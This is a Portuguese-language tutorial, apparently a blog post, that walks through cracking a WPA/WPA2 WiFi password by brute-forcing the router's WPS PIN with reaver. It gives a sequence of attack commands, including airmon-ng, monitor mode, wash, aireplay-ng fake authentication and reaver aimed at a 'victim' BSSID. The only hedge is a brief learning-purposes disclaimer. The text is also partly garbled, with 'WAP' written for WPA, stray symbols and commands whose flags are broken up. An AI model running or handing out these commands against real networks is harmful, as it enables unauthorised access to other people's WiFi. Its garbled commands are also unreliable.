Todos sabemos que a maioria das pessoas prefere colocar uma senha WiFi à sua conexão sem fio. Isto pode ser tão simples como 12345 ou tão complexo como uma combinação de múltiplas letras, números e caracteres. Bem, aqui estão as más notícias, há uma ferramenta com o nome reaver que pode ser usada para quebrar a sua senha WiFi WAP/WAP2.
Sobre WEP, WAP e WAP2
Para melhorar as funções do WEP (Wired Equivalent Privacy), o WiFi Protected Access ou WPA foi criado em 2003. Este melhoramento temporário ainda tem uma segurança relativamente fraca mas é mais fácil de configurar. WPA usa o Temporal Key Integrity Protocol (TKIP) para criptografia mais segura do que a WEP oferecida.
Um ano mais tarde, em 2004, o WiFi Protected Access 2 ficou disponível. O WPA2 tem maior segurança e é mais fácil de configurar do que as opções anteriores. A principal diferença com o WPA2 é que ele usa o Advanced Encryption Standard (AES) em vez do TKIP.
What You Need.
>
- >
- Um adaptador WiFi que suporta modo monitor
- Um computador com WiFi
- Uma rede WiFi protegida por WPA próxima
- Reaver instalado
- Persistência
>
>
>
>
>
Assumo que o seu router está configurado para não usar a autenticação por botão de pressão.(PBC)
Vamos fazer isto
Primeiro, se estiver a utilizar uma máquina virtual, tem de activar o seu controlador USB, indo às definições, depois clique em USB e escolha o seu dispositivo USB.
NB: Certifique-se de que o adaptador sem fios que está a utilizar suporta o modo monitor.
Após isso, execute o seguinte comando:
iwconfig
Este comando mostra apenas interfaces sem fios
Executar:
sudo ifconfig wlan0 down
Esta opção desactiva WiFi
Então:
sudo airmon-ng check kill
Este comando mata qualquer processo que possa interferir com o uso da minha interface no modo monitor. Ele mata o gerenciador de rede para que não haja internet.
Então execute:
iwconfig wlan0 mode monitor
Este comando muda o modo do modo gerenciado para o modo monitor.
O modo gerenciado é o modo padrão para todos os dispositivos sem fio.
A razão pela qual precisamos mudar o modo de modo gerenciado para modo monitor é porque não só queremos capturar os pacotes que têm o endereço MAC para o nosso dispositivo, mas todos os pacotes, mesmo aqueles enviados para o roteador e outros dispositivos. Isto só é possível quando o adaptador WiFi está em modo monitor.
Então run:
sudo ifconfig wlan0 up
Isso traz o wifi de volta.
Então run:
iwconfig
Isso é para verificar se o nosso modo mudou de gerenciado para monitor. Se mudou, deve ser indicado no terminal.
A figura abaixo mostra que o modo mudou de monitor.
wash - interface wlan0
Isso mostra todos os Aps WPS habilitados usando interface wireless.
Aireplay-ng - fakeauth 30 -a<bssid> -h <macid> wlan0
Para ID mac abra uma nova aba e digite ifconfig. Copie os primeiros 12 dígitos da unspec em wlan0.
DON’T HIT ENTER YET.
Abra outra nova aba.
Confirme que você tem o reaver instalado. Se você não tiver, execute o seguinte comando.
Sudo apt-get install aircrack-ng reaver
Esta vai instalar o reaver.
Reaver brute força o pino e o associa ao alvo, uma vez que ele tem o pino, ele o usa para calcular a chave WAP/WAP2 real.
A seguir execute o seguinte comando:
Reaver - bssid<victim bssid> - channel <the channel of the victim> - interface wlan0 –vvv - no-associate
Escreva enter nesta aba e também pressione enter na outra aba que eu disse para não pressionar enter.
Esta operação deve demorar alguns minutos uma vez que está a tentar todas as combinações possíveis e finalmente irá dar-lhe o pin WPS, a password WAP e o nome do Wi-Fi
DISCLAIMER. Este artigo é para fins de aprendizagem, não nos responsabilizamos por qualquer dano causado enquanto nos referimos a ele.
Artigo por Restercuter Nyawira, membro da SheHacks KE, treinadora e entusiasta da segurança cibernética. Encontre-a no LinkedIn (Restercuter Nyawira) e no Twitter @Restercuter1.